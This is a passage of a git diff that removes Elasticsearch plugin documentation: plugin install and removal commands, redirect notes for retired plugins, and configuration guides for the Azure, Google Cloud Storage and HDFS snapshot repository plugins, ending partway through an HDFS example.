/dev/null @@ -1,271 +0,0 @@ -[[plugin-management]] -== Plugin Management - -The `plugin` script is used to install, list, and remove plugins. It is -located in the `$ES_HOME/bin` directory by default but it may be in a -different location depending on which Elasticsearch package you installed: - -* {ref}/targz.html#targz-layout[Directory layout of `.tar.gz` archives] -* {ref}/zip-windows.html#windows-layout[Directory layout of Windows `.zip` archives] -* {ref}/deb.html#deb-layout[Directory layout of Debian package] -* {ref}/rpm.html#rpm-layout[Directory layout of RPM] - -Run the following command to get usage instructions: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin -h ------------------------------------ - -[IMPORTANT] -.Running as root -===================== -If Elasticsearch was installed using the deb or rpm package then run -`/usr/share/elasticsearch/bin/elasticsearch-plugin` as `root` so it can write to the appropriate files on disk. -Otherwise run `bin/elasticsearch-plugin` as the user that owns all of the Elasticsearch -files. -===================== - -[[installation]] -=== Installing Plugins - -The documentation for each plugin usually includes specific installation -instructions for that plugin, but below we document the various available -options: - -[discrete] -=== Core Elasticsearch plugins - -Core Elasticsearch plugins can be installed as follows: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install [plugin_name] ------------------------------------ - -For instance, to install the core <>, just run the -following command: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install analysis-icu ------------------------------------ - -This command will install the version of the plugin that matches your -Elasticsearch version and also show a progress bar while downloading. 
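-
-If you script the installation (for example across many hosts), the same
-command can be driven from code; the `--batch` flag described later on this
-page suppresses the interactive confirmation. A minimal sketch, assumed to run
-from the Elasticsearch home directory on the node itself:
-
-[source,python]
---------------------------------------------------
-# Install a plugin non-interactively, then confirm it appears in the plugin list.
-import subprocess
-
-PLUGIN = "analysis-icu"  # example core plugin
-
-subprocess.run(
-    ["sudo", "bin/elasticsearch-plugin", "install", "--batch", PLUGIN],
-    check=True,
-)
-
-listed = subprocess.run(
-    ["sudo", "bin/elasticsearch-plugin", "list"],
-    check=True, capture_output=True, text=True,
-).stdout
-print("installed" if PLUGIN in listed else "not found")
---------------------------------------------------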
- -[[plugin-management-custom-url]] -=== Custom URL or file system - -A plugin can also be downloaded directly from a custom location by specifying the URL: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install [url] <1> ------------------------------------ -<1> must be a valid URL, the plugin name is determined from its descriptor. - --- -Unix:: -To install a plugin from your local file system at `/path/to/plugin.zip`, you could run: -+ -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install file:///path/to/plugin.zip ------------------------------------ - -Windows:: -To install a plugin from your local file system at `C:\path\to\plugin.zip`, you could run: -+ -[source,shell] ------------------------------------ -bin\elasticsearch-plugin install file:///C:/path/to/plugin.zip ------------------------------------ -+ -NOTE: Any path that contains spaces must be wrapped in quotes! -+ -NOTE: If you are installing a plugin from the filesystem the plugin distribution -must not be contained in the `plugins` directory for the node that you are -installing the plugin to or installation will fail. - -HTTP:: -To install a plugin from an HTTP URL: -+ -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install https://some.domain/path/to/plugin.zip ------------------------------------ -+ -The plugin script will refuse to talk to an HTTPS URL with an untrusted -certificate. To use a self-signed HTTPS cert, you will need to add the CA cert -to a local Java truststore and pass the location to the script as follows: -+ -[source,shell] ------------------------------------ -sudo ES_JAVA_OPTS="-Djavax.net.ssl.trustStore=/path/to/trustStore.jks" bin/elasticsearch-plugin install https://host/plugin.zip ------------------------------------ --- - -[[installing-multiple-plugins]] -=== Installing multiple plugins - -Multiple plugins can be installed in one invocation as follows: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install [plugin_id] [plugin_id] ... [plugin_id] ------------------------------------ - -Each `plugin_id` can be any valid form for installing a single plugin (e.g., the -name of a core plugin, or a custom URL). - -For instance, to install the core <>, and -<> run the following command: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install analysis-icu repository-s3 ------------------------------------ - -This command will install the versions of the plugins that matches your -Elasticsearch version. The installation will be treated as a transaction, so -that all the plugins will be installed, or none of the plugins will be installed -if any installation fails. - -[[mandatory-plugins]] -=== Mandatory Plugins - -If you rely on some plugins, you can define mandatory plugins by adding -`plugin.mandatory` setting to the `config/elasticsearch.yml` file, for -example: - -[source,yaml] --------------------------------------------------- -plugin.mandatory: analysis-icu,lang-js --------------------------------------------------- - -For safety reasons, a node will not start if it is missing a mandatory plugin. 
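-
-Since a node refuses to start when a mandatory plugin is missing, it can be
-worth checking the plugins directory against `plugin.mandatory` before a
-restart. A minimal sketch, assuming the `.tar.gz` archive layout and the
-comma-separated setting format shown above (paths are placeholders; adjust
-them for package installs):
-
-[source,python]
---------------------------------------------------
-# Compare plugin.mandatory in elasticsearch.yml with the plugins/ directory.
-from pathlib import Path
-
-import yaml  # PyYAML
-
-es_home = Path("/path/to/elasticsearch")  # placeholder ES home directory
-config = yaml.safe_load((es_home / "config" / "elasticsearch.yml").read_text()) or {}
-
-mandatory = {p.strip() for p in str(config.get("plugin.mandatory", "")).split(",") if p.strip()}
-installed = {p.name for p in (es_home / "plugins").iterdir() if p.is_dir()}
-
-missing = mandatory - installed
-print("missing mandatory plugins:", ", ".join(sorted(missing)) or "none")
---------------------------------------------------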
- -[[listing-removing-updating]] -=== Listing, Removing and Updating Installed Plugins - -[discrete] -=== Listing plugins - -A list of the currently loaded plugins can be retrieved with the `list` option: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin list ------------------------------------ - -Alternatively, use the {ref}/cluster-nodes-info.html[node-info API] to find -out which plugins are installed on each node in the cluster - -[discrete] -=== Removing plugins - -Plugins can be removed manually, by deleting the appropriate directory under -`plugins/`, or using the public script: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin remove [pluginname] ------------------------------------ - -After a Java plugin has been removed, you will need to restart the node to -complete the removal process. - -By default, plugin configuration files (if any) are preserved on disk; this is -so that configuration is not lost while upgrading a plugin. If you wish to -purge the configuration files while removing a plugin, use `-p` or `--purge`. -This can option can be used after a plugin is removed to remove any lingering -configuration files. - -[discrete] -=== Updating plugins - -Plugins are built for a specific version of Elasticsearch, and therefore must be reinstalled -each time Elasticsearch is updated. - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin remove [pluginname] -sudo bin/elasticsearch-plugin install [pluginname] ------------------------------------ - -=== Other command line parameters - -The `plugin` scripts supports a number of other command line parameters: - -[discrete] -=== Silent/Verbose mode - -The `--verbose` parameter outputs more debug information, while the `--silent` -parameter turns off all output including the progress bar. The script may -return the following exit codes: - -[horizontal] -`0`:: everything was OK -`64`:: unknown command or incorrect option parameter -`74`:: IO error -`70`:: any other error - -[discrete] -=== Batch mode - -Certain plugins require more privileges than those provided by default in core -Elasticsearch. These plugins will list the required privileges and ask the -user for confirmation before continuing with installation. - -When running the plugin install script from another program (e.g. install -automation scripts), the plugin script should detect that it is not being -called from the console and skip the confirmation response, automatically -granting all requested permissions. If console detection fails, then batch -mode can be forced by specifying `-b` or `--batch` as follows: - -[source,shell] ------------------------------------ -sudo bin/elasticsearch-plugin install --batch [pluginname] ------------------------------------ - -[discrete] -=== Custom config directory - -If your `elasticsearch.yml` config file is in a custom location, you will need -to specify the path to the config file when using the `plugin` script. 
You -can do this as follows: - -[source,sh] ---------------------- -sudo ES_PATH_CONF=/path/to/conf/dir bin/elasticsearch-plugin install ---------------------- - -[discrete] -=== Proxy settings - -To install a plugin via a proxy, you can add the proxy details to the -`ES_JAVA_OPTS` environment variable with the Java settings `http.proxyHost` -and `http.proxyPort` (or `https.proxyHost` and `https.proxyPort`): - -[source,shell] ------------------------------------ -sudo ES_JAVA_OPTS="-Dhttp.proxyHost=host_name -Dhttp.proxyPort=port_number -Dhttps.proxyHost=host_name -Dhttps.proxyPort=https_port_number" bin/elasticsearch-plugin install analysis-icu ------------------------------------ - -Or on Windows: - -[source,shell] ------------------------------------- -set ES_JAVA_OPTS="-Dhttp.proxyHost=host_name -Dhttp.proxyPort=port_number -Dhttps.proxyHost=host_name -Dhttps.proxyPort=https_port_number" -bin\elasticsearch-plugin install analysis-icu ------------------------------------- - -=== Plugins directory - -The default location of the `plugins` directory depends on which package you install: - -* {ref}/targz.html#targz-layout[Directory layout of `.tar.gz` archives] -* {ref}/zip-windows.html#windows-layout[Directory layout of Windows `.zip` archives] -* {ref}/deb.html#deb-layout[Directory layout of Debian package] -* {ref}/rpm.html#rpm-layout[Directory layout of RPM] diff --git a/docs/plugins/redirects.asciidoc b/docs/plugins/redirects.asciidoc deleted file mode 100644 index 6e5675309d7..00000000000 --- a/docs/plugins/redirects.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ -["appendix",role="exclude",id="redirects"] -= Deleted pages - -The following pages have moved or been deleted. - -[role="exclude",id="discovery-multicast"] -=== Multicast Discovery Plugin - -The `multicast-discovery` plugin has been removed. Instead, configure networking -using unicast (see {ref}/modules-network.html[Network settings]) or using -one of the <>. - -[role="exclude",id="cloud-aws"] -=== AWS Cloud Plugin - -Looking for a hosted solution for Elasticsearch on AWS? Check out https://www.elastic.co/cloud/. - -The Elasticsearch `cloud-aws` plugin has been split into two separate plugins: - -* <> (`discovery-ec2`) -* <> (`repository-s3`) - -[role="exclude",id="cloud-azure"] -=== Azure Cloud Plugin - -The `cloud-azure` plugin has been split into two separate plugins: - -* <> (`discovery-azure-classic`) -* <> (`repository-azure`) - - -[role="exclude",id="cloud-gce"] -=== GCE Cloud Plugin - -The `cloud-gce` plugin has been renamed to <> (`discovery-gce`). - -[role="exclude",id="plugins-delete-by-query"] -=== Delete-By-Query plugin removed - -The Delete-By-Query plugin has been removed in favor of a new {ref}/docs-delete-by-query.html[Delete By Query API] -implementation in core. - - - - - - - diff --git a/docs/plugins/repository-azure.asciidoc b/docs/plugins/repository-azure.asciidoc deleted file mode 100644 index f5b318b4d06..00000000000 --- a/docs/plugins/repository-azure.asciidoc +++ /dev/null @@ -1,253 +0,0 @@ -[[repository-azure]] -=== Azure Repository Plugin - -The Azure Repository plugin adds support for using Azure as a repository for -{ref}/modules-snapshots.html[Snapshot/Restore]. 
- -:plugin_name: repository-azure -include::install_remove.asciidoc[] - -[[repository-azure-usage]] -==== Azure Repository - -To enable Azure repositories, you have first to define your azure storage settings as -{ref}/secure-settings.html[secure settings], before starting up the node: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore add azure.client.default.account -bin/elasticsearch-keystore add azure.client.default.key ----------------------------------------------------------------- - -Note that you can also define more than one account: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore add azure.client.default.account -bin/elasticsearch-keystore add azure.client.default.key -bin/elasticsearch-keystore add azure.client.secondary.account -bin/elasticsearch-keystore add azure.client.secondary.sas_token ----------------------------------------------------------------- - -For more information about these settings, see -<>. - -[IMPORTANT] -.Supported Azure Storage Account types -=============================================== -The Azure Repository plugin works with all Standard storage accounts - -* Standard Locally Redundant Storage - `Standard_LRS` -* Standard Zone-Redundant Storage - `Standard_ZRS` -* Standard Geo-Redundant Storage - `Standard_GRS` -* Standard Read Access Geo-Redundant Storage - `Standard_RAGRS` - -https://azure.microsoft.com/en-gb/documentation/articles/storage-premium-storage[Premium Locally Redundant Storage] (`Premium_LRS`) is **not supported** as it is only usable as VM disk storage, not as general storage. -=============================================== - -[[repository-azure-client-settings]] -==== Client settings - -The client that you use to connect to Azure has a number of settings available. -The settings have the form `azure.client.CLIENT_NAME.SETTING_NAME`. By default, -`azure` repositories use a client named `default`, but this can be modified using -the <> `client`. -For example: - -[source,console] ----- -PUT _snapshot/my_backup -{ - "type": "azure", - "settings": { - "client": "secondary" - } -} ----- -// TEST[skip:we don't have azure setup while testing this] - -Most client settings can be added to the `elasticsearch.yml` configuration file. -For example: - -[source,yaml] ----- -azure.client.default.timeout: 10s -azure.client.default.max_retries: 7 -azure.client.default.endpoint_suffix: core.chinacloudapi.cn -azure.client.secondary.timeout: 30s ----- - -In this example, the client side timeout is `10s` per try for the `default` -account with `7` retries before failing. The endpoint suffix is -`core.chinacloudapi.cn` and `30s` per try for the `secondary` account with `3` -retries. - -The `account`, `key`, and `sas_token` storage settings are reloadable secure -settings, which you add to the {es} keystore. For more information about -creating and updating the {es} keystore, see -{ref}/secure-settings.html[Secure settings]. After you reload the settings, the -internal Azure clients, which are used to transfer the snapshot, utilize the -latest settings from the keystore. - -NOTE: In progress snapshot or restore jobs will not be preempted by a *reload* -of the storage secure settings. They will complete using the client as it was -built when the operation started. - -The following list contains the available client settings. 
Those that must be -stored in the keystore are marked as "secure"; the other settings belong in the -`elasticsearch.yml` file. - -`account` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - The Azure account name, which is used by the repository's internal Azure client. - -`endpoint_suffix`:: - The Azure endpoint suffix to connect to. The default value is - `core.windows.net`. - -`key` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - The Azure secret key, which is used by the repository's internal Azure client. Alternatively, use `sas_token`. - -`max_retries`:: - The number of retries to use when an Azure request fails. This setting helps - control the exponential backoff policy. It specifies the number of retries - that must occur before the snapshot fails. The default value is `3`. The - initial backoff period is defined by Azure SDK as `30s`. Thus there is `30s` - of wait time before retrying after a first timeout or failure. The maximum - backoff period is defined by Azure SDK as `90s`. - -`proxy.host`:: - The host name of a proxy to connect to Azure through. For example: `azure.client.default.proxy.host: proxy.host`. - -`proxy.port`:: - The port of a proxy to connect to Azure through. For example, `azure.client.default.proxy.port: 8888`. - -`proxy.type`:: - Register a proxy type for the client. Supported values are `direct`, `http`, - and `socks`. For example: `azure.client.default.proxy.type: http`. When - `proxy.type` is set to `http` or `socks`, `proxy.host` and `proxy.port` must - also be provided. The default value is `direct`. - -`sas_token` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - A shared access signatures (SAS) token, which the repository's internal Azure - client uses for authentication. The SAS token must have read (r), write (w), - list (l), and delete (d) permissions for the repository base path and all its - contents. These permissions must be granted for the blob service (b) and apply - to resource types service (s), container (c), and object (o). Alternatively, - use `key`. - -`timeout`:: - The client side timeout for any single request to Azure. The value should - specify the time unit. For example, a value of `5s` specifies a 5 second - timeout. There is no default value, which means that {es} uses the - https://azure.github.io/azure-storage-java/com/microsoft/azure/storage/RequestOptions.html#setTimeoutIntervalInMs(java.lang.Integer)[default value] - set by the Azure client (known as 5 minutes). This setting can be defined - globally, per account, or both. - -[[repository-azure-repository-settings]] -==== Repository settings - -The Azure repository supports following settings: - -`client`:: - - Azure named client to use. Defaults to `default`. - -`container`:: - - Container name. You must create the azure container before creating the repository. - Defaults to `elasticsearch-snapshots`. - -`base_path`:: - - Specifies the path within container to repository data. Defaults to empty - (root directory). - -`chunk_size`:: - - Big files can be broken down into multiple smaller blobs in the blob store during snapshotting. - It is not recommended to change this value from its default unless there is an explicit reason for limiting the - size of blobs in the repository. 
Setting a value lower than the default can result in an increased number of API - calls to the Azure blob store during snapshot create as well as restore operations compared to using the default - value and thus make both operations slower as well as more costly. - Specify the chunk size as a value and unit, for example: - `10MB`, `5KB`, `500B`. Defaults to the maximum size of a blob in the Azure blob store which is `5TB`. - -`compress`:: - - When set to `true` metadata files are stored in compressed format. This - setting doesn't affect index files that are already compressed by default. - Defaults to `false`. - -include::repository-shared-settings.asciidoc[] - -`location_mode`:: - - `primary_only` or `secondary_only`. Defaults to `primary_only`. Note that if you set it - to `secondary_only`, it will force `readonly` to true. - -Some examples, using scripts: - -[source,console] ----- -# The simplest one -PUT _snapshot/my_backup1 -{ - "type": "azure" -} - -# With some settings -PUT _snapshot/my_backup2 -{ - "type": "azure", - "settings": { - "container": "backup-container", - "base_path": "backups", - "chunk_size": "32MB", - "compress": true - } -} - - -# With two accounts defined in elasticsearch.yml (my_account1 and my_account2) -PUT _snapshot/my_backup3 -{ - "type": "azure", - "settings": { - "client": "secondary" - } -} -PUT _snapshot/my_backup4 -{ - "type": "azure", - "settings": { - "client": "secondary", - "location_mode": "primary_only" - } -} ----- -// TEST[skip:we don't have azure setup while testing this] - -Example using Java: - -[source,java] ----- -client.admin().cluster().preparePutRepository("my_backup_java1") - .setType("azure").setSettings(Settings.builder() - .put(Storage.CONTAINER, "backup-container") - .put(Storage.CHUNK_SIZE, new ByteSizeValue(32, ByteSizeUnit.MB)) - ).get(); ----- - -[[repository-azure-validation]] -==== Repository validation rules - -According to the -https://docs.microsoft.com/en-us/rest/api/storageservices/Naming-and-Referencing-Containers--Blobs--and-Metadata[containers -naming guide], a container name must be a valid DNS name, conforming to the -following naming rules: - -* Container names must start with a letter or number, and can contain only letters, numbers, and the dash (-) character. -* Every dash (-) character must be immediately preceded and followed by a letter or number; consecutive dashes are not -permitted in container names. -* All letters in a container name must be lowercase. -* Container names must be from 3 through 63 characters long. diff --git a/docs/plugins/repository-gcs.asciidoc b/docs/plugins/repository-gcs.asciidoc deleted file mode 100644 index a02a7a2034d..00000000000 --- a/docs/plugins/repository-gcs.asciidoc +++ /dev/null @@ -1,261 +0,0 @@ -[[repository-gcs]] -=== Google Cloud Storage Repository Plugin - -The GCS repository plugin adds support for using the https://cloud.google.com/storage/[Google Cloud Storage] -service as a repository for {ref}/modules-snapshots.html[Snapshot/Restore]. - -:plugin_name: repository-gcs -include::install_remove.asciidoc[] - -[[repository-gcs-usage]] -==== Getting started - -The plugin uses the https://github.com/GoogleCloudPlatform/google-cloud-java/tree/master/google-cloud-clients/google-cloud-storage[Google Cloud Java Client for Storage] -to connect to the Storage service. If you are using -https://cloud.google.com/storage/[Google Cloud Storage] for the first time, you -must connect to the https://console.cloud.google.com/[Google Cloud Platform Console] -and create a new project. 
After your project is created, you must enable the -Cloud Storage Service for your project. - -[[repository-gcs-creating-bucket]] -===== Creating a Bucket - -The Google Cloud Storage service uses the concept of a -https://cloud.google.com/storage/docs/key-terms[bucket] as a container for all -the data. Buckets are usually created using the -https://console.cloud.google.com/[Google Cloud Platform Console]. The plugin -does not automatically create buckets. - -To create a new bucket: - -1. Connect to the https://console.cloud.google.com/[Google Cloud Platform Console]. -2. Select your project. -3. Go to the https://console.cloud.google.com/storage/browser[Storage Browser]. -4. Click the *Create Bucket* button. -5. Enter the name of the new bucket. -6. Select a storage class. -7. Select a location. -8. Click the *Create* button. - -For more detailed instructions, see the -https://cloud.google.com/storage/docs/quickstart-console#create_a_bucket[Google Cloud documentation]. - -[[repository-gcs-service-authentication]] -===== Service Authentication - -The plugin must authenticate the requests it makes to the Google Cloud Storage -service. It is common for Google client libraries to employ a strategy named https://cloud.google.com/docs/authentication/production#providing_credentials_to_your_application[application default credentials]. -However, that strategy is **not** supported for use with Elasticsearch. The -plugin operates under the Elasticsearch process, which runs with the security -manager enabled. The security manager obstructs the "automatic" credential discovery. -Therefore, you must configure <> -credentials even if you are using an environment that does not normally require -this configuration (such as Compute Engine, Kubernetes Engine or App Engine). - -[[repository-gcs-using-service-account]] -===== Using a Service Account -You have to obtain and provide https://cloud.google.com/iam/docs/overview#service_account[service account credentials] -manually. - -For detailed information about generating JSON service account files, see the https://cloud.google.com/storage/docs/authentication?hl=en#service_accounts[Google Cloud documentation]. -Note that the PKCS12 format is not supported by this plugin. - -Here is a summary of the steps: - -1. Connect to the https://console.cloud.google.com/[Google Cloud Platform Console]. -2. Select your project. -3. Go to the https://console.cloud.google.com/permissions[Permission] tab. -4. Select the https://console.cloud.google.com/permissions/serviceaccounts[Service Accounts] tab. -5. Click *Create service account*. -6. After the account is created, select it and download a JSON key file. - -A JSON service account file looks like this: - -[source,js] ----- -{ - "type": "service_account", - "project_id": "your-project-id", - "private_key_id": "...", - "private_key": "-----BEGIN PRIVATE KEY-----\n...\n-----END PRIVATE KEY-----\n", - "client_email": "service-account-for-your-repository@your-project-id.iam.gserviceaccount.com", - "client_id": "...", - "auth_uri": "https://accounts.google.com/o/oauth2/auth", - "token_uri": "https://accounts.google.com/o/oauth2/token", - "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs", - "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/your-bucket@your-project-id.iam.gserviceaccount.com" -} ----- -// NOTCONSOLE - -To provide this file to the plugin, it must be stored in the {ref}/secure-settings.html[Elasticsearch keystore]. 
You must -add a `file` setting with the name `gcs.client.NAME.credentials_file` using the `add-file` subcommand. - `NAME` is the name of the client configuration for the repository. The implicit client -name is `default`, but a different client name can be specified in the -repository settings with the `client` key. - -NOTE: Passing the file path via the GOOGLE_APPLICATION_CREDENTIALS environment -variable is **not** supported. - -For example, if you added a `gcs.client.my_alternate_client.credentials_file` -setting in the keystore, you can configure a repository to use those credentials -like this: - -[source,console] ----- -PUT _snapshot/my_gcs_repository -{ - "type": "gcs", - "settings": { - "bucket": "my_bucket", - "client": "my_alternate_client" - } -} ----- -// TEST[skip:we don't have gcs setup while testing this] - -The `credentials_file` settings are {ref}/secure-settings.html#reloadable-secure-settings[reloadable]. -After you reload the settings, the internal `gcs` clients, which are used to -transfer the snapshot contents, utilize the latest settings from the keystore. - -NOTE: Snapshot or restore jobs that are in progress are not preempted by a *reload* -of the client's `credentials_file` settings. They complete using the client as -it was built when the operation started. - -[[repository-gcs-client]] -==== Client Settings - -The client used to connect to Google Cloud Storage has a number of settings available. -Client setting names are of the form `gcs.client.CLIENT_NAME.SETTING_NAME` and are specified -inside `elasticsearch.yml`. The default client name looked up by a `gcs` repository is -called `default`, but can be customized with the repository setting `client`. - -For example: - -[source,console] ----- -PUT _snapshot/my_gcs_repository -{ - "type": "gcs", - "settings": { - "bucket": "my_bucket", - "client": "my_alternate_client" - } -} ----- -// TEST[skip:we don't have gcs setup while testing this] - -Some settings are sensitive and must be stored in the -{ref}/secure-settings.html[Elasticsearch keystore]. This is the case for the service account file: - -[source,sh] ----- -bin/elasticsearch-keystore add-file gcs.client.default.credentials_file /path/service-account.json ----- - -The following are the available client settings. Those that must be stored in the keystore -are marked as `Secure`. - -`credentials_file` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - The service account file that is used to authenticate to the Google Cloud Storage service. - -`endpoint`:: - - The Google Cloud Storage service endpoint to connect to. This will be automatically - determined by the Google Cloud Storage client but can be specified explicitly. - -`connect_timeout`:: - - The timeout to establish a connection to the Google Cloud Storage service. The value should - specify the unit. For example, a value of `5s` specifies a 5 second timeout. The value of `-1` - corresponds to an infinite timeout. The default value is 20 seconds. - -`read_timeout`:: - - The timeout to read data from an established connection. The value should - specify the unit. For example, a value of `5s` specifies a 5 second timeout. The value of `-1` - corresponds to an infinite timeout. The default value is 20 seconds. - -`application_name`:: - - Name used by the client when it uses the Google Cloud Storage service. Setting - a custom name can be useful to authenticate your cluster when requests - statistics are logged in the Google Cloud Platform. 
Default to `repository-gcs` - -`project_id`:: - - The Google Cloud project id. This will be automatically inferred from the credentials file but - can be specified explicitly. For example, it can be used to switch between projects when the - same credentials are usable for both the production and the development projects. - -[[repository-gcs-repository]] -==== Repository Settings - -The `gcs` repository type supports a number of settings to customize how data -is stored in Google Cloud Storage. - -These can be specified when creating the repository. For example: - -[source,console] ----- -PUT _snapshot/my_gcs_repository -{ - "type": "gcs", - "settings": { - "bucket": "my_other_bucket", - "base_path": "dev" - } -} ----- -// TEST[skip:we don't have gcs set up while testing this] - -The following settings are supported: - -`bucket`:: - - The name of the bucket to be used for snapshots. (Mandatory) - -`client`:: - - The name of the client to use to connect to Google Cloud Storage. - Defaults to `default`. - -`base_path`:: - - Specifies the path within bucket to repository data. Defaults to - the root of the bucket. - -`chunk_size`:: - - Big files can be broken down into multiple smaller blobs in the blob store during snapshotting. - It is not recommended to change this value from its default unless there is an explicit reason for limiting the - size of blobs in the repository. Setting a value lower than the default can result in an increased number of API - calls to the Google Cloud Storage Service during snapshot create as well as restore operations compared to using - the default value and thus make both operations slower as well as more costly. - Specify the chunk size as a value and unit, for example: - `10MB`, `5KB`, `500B`. Defaults to the maximum size of a blob in the Google Cloud Storage Service which is `5TB`. - -`compress`:: - - When set to `true` metadata files are stored in compressed format. This - setting doesn't affect index files that are already compressed by default. - Defaults to `false`. - -include::repository-shared-settings.asciidoc[] - -`application_name`:: - - deprecated:[6.3.0, "This setting is now defined in the <>."] - Name used by the client when it uses the Google Cloud Storage service. - -[[repository-gcs-bucket-permission]] -===== Recommended Bucket Permission - -The service account used to access the bucket must have the "Writer" access to the bucket: - -1. Connect to the https://console.cloud.google.com/[Google Cloud Platform Console]. -2. Select your project. -3. Go to the https://console.cloud.google.com/storage/browser[Storage Browser]. -4. Select the bucket and "Edit bucket permission". -5. The service account must be configured as a "User" with "Writer" access. diff --git a/docs/plugins/repository-hdfs.asciidoc b/docs/plugins/repository-hdfs.asciidoc deleted file mode 100644 index 2dcc2027177..00000000000 --- a/docs/plugins/repository-hdfs.asciidoc +++ /dev/null @@ -1,188 +0,0 @@ -[[repository-hdfs]] -=== Hadoop HDFS Repository Plugin - -The HDFS repository plugin adds support for using HDFS File System as a repository for -{ref}/modules-snapshots.html[Snapshot/Restore]. - -:plugin_name: repository-hdfs -include::install_remove.asciidoc[] - -[[repository-hdfs-usage]] -==== Getting started with HDFS - -The HDFS snapshot/restore plugin is built against the latest Apache Hadoop 2.x (currently 2.7.1). 
If the distro you are using is not protocol -compatible with Apache Hadoop, consider replacing the Hadoop libraries inside the plugin folder with your own (you might have to adjust the security permissions required). - -Even if Hadoop is already installed on the Elasticsearch nodes, for security reasons, the required libraries need to be placed under the plugin folder. Note that in most cases, if the distro is compatible, one simply needs to configure the repository with the appropriate Hadoop configuration files (see below). - -Windows Users:: -Using Apache Hadoop on Windows is problematic and thus it is not recommended. For those _really_ wanting to use it, make sure you place the elusive `winutils.exe` under the -plugin folder and point `HADOOP_HOME` variable to it; this should minimize the amount of permissions Hadoop requires (though one would still have to add some more). - -[[repository-hdfs-config]] -==== Configuration Properties - -Once installed, define the configuration for the `hdfs` repository through the -{ref}/modules-snapshots.html[REST API]: - -[source,console] ----- -PUT _snapshot/my_hdfs_repository -{ - "type": "hdfs", - "settings": { - "uri": "hdfs://namenode:8020/", - "path": "elasticsearch/repositories/my_hdfs_repository", - "conf.dfs.client.read.shortcircuit": "true" - } -} ----- -// TEST[skip:we don't have hdfs set up while testing this] - -The following settings are supported: - -[horizontal] -`uri`:: - - The uri address for hdfs. ex: "hdfs://:/". (Required) - -`path`:: - - The file path within the filesystem where data is stored/loaded. ex: "path/to/file". (Required) - -`load_defaults`:: - - Whether to load the default Hadoop configuration or not. (Enabled by default) - -`conf.`:: - - Inlined configuration parameter to be added to Hadoop configuration. (Optional) - Only client oriented properties from the hadoop https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/core-default.xml[core] and https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/hdfs-default.xml[hdfs] configuration files will be recognized by the plugin. - -`compress`:: - - Whether to compress the metadata or not. (Disabled by default) - -include::repository-shared-settings.asciidoc[] - -`chunk_size`:: - - Override the chunk size. (Disabled by default) - -`security.principal`:: - - Kerberos principal to use when connecting to a secured HDFS cluster. - If you are using a service principal for your elasticsearch node, you may - use the `_HOST` pattern in the principal name and the plugin will replace - the pattern with the hostname of the node at runtime (see - link:repository-hdfs-security-runtime[Creating the Secure Repository]). - -[[repository-hdfs-availability]] -[discrete] -===== A Note on HDFS Availability -When you initialize a repository, its settings are persisted in the cluster state. When a node comes online, it will -attempt to initialize all repositories for which it has settings. If your cluster has an HDFS repository configured, then -all nodes in the cluster must be able to reach HDFS when starting. If not, then the node will fail to initialize the -repository at start up and the repository will be unusable. If this happens, you will need to remove and re-add the -repository or restart the offending node. - -[[repository-hdfs-security]] -==== Hadoop Security - -The HDFS Repository Plugin integrates seamlessly with Hadoop's authentication model. 
The following authentication -methods are supported by the plugin: - -[horizontal] -`simple`:: - - Also means "no security" and is enabled by default. Uses information from underlying operating system account - running Elasticsearch to inform Hadoop of the name of the current user. Hadoop makes no attempts to verify this - information. - -`kerberos`:: - - Authenticates to Hadoop through the usage of a Kerberos principal and keytab. Interfacing with HDFS clusters - secured with Kerberos requires a few additional steps to enable (See <> and - <> for more info) - -[[repository-hdfs-security-keytabs]] -[discrete] -===== Principals and Keytabs -Before attempting to connect to a secured HDFS cluster, provision the Kerberos principals and keytabs that the -Elasticsearch nodes will use for authenticating to Kerberos. For maximum security and to avoid tripping up the Kerberos -replay protection, you should create a service principal per node, following the pattern of -`elasticsearch/hostname@REALM`. - -WARNING: In some cases, if the same principal is authenticating from multiple clients at once, services may reject -authentication for those principals under the assumption that they could be replay attacks. If you are running the -plugin in production with multiple nodes you should be using a unique service principal for each node. - -On each Elasticsearch node, place the appropriate keytab file in the node's configuration location under the -`repository-hdfs` directory using the name `krb5.keytab`: - -[source, bash] ----- -$> cd elasticsearch/config -$> ls -elasticsearch.yml jvm.options log4j2.properties repository-hdfs/ scripts/ -$> cd repository-hdfs -$> ls -krb5.keytab ----- -// TEST[skip:this is for demonstration purposes only - -NOTE: Make sure you have the correct keytabs! If you are using a service principal per node (like -`elasticsearch/hostname@REALM`) then each node will need its own unique keytab file for the principal assigned to that -host! - -// Setup at runtime (principal name) -[[repository-hdfs-security-runtime]] -[discrete] -===== Creating the Secure Repository -Once your keytab files are in place and your cluster is started, creating a secured HDFS repository is simple. Just -add the name of the principal that you will be authenticating as in the repository settings under the -`security.principal` option: - -[source,console] ----- -PUT _snapshot/my_hdfs_repository -{ - "type": "hdfs", - "settings": { - "uri": "hdfs://namenode:8020/", - "path": "/user/elasticsearch/repositories/my_hdfs_repository", - "security.principal": "elasticsearch@REALM" - } -} ----- -// TEST[skip:we don't have hdfs set up while testing this] - -If you are using different service principals for each node, you can use the `_HOST` pattern in your principal -name. Elasticsearch will automatically replace the pattern with the hostname of the node at runtime: - -[source,console] ----- -PUT _snapshot/my_hdfs_repository -{ 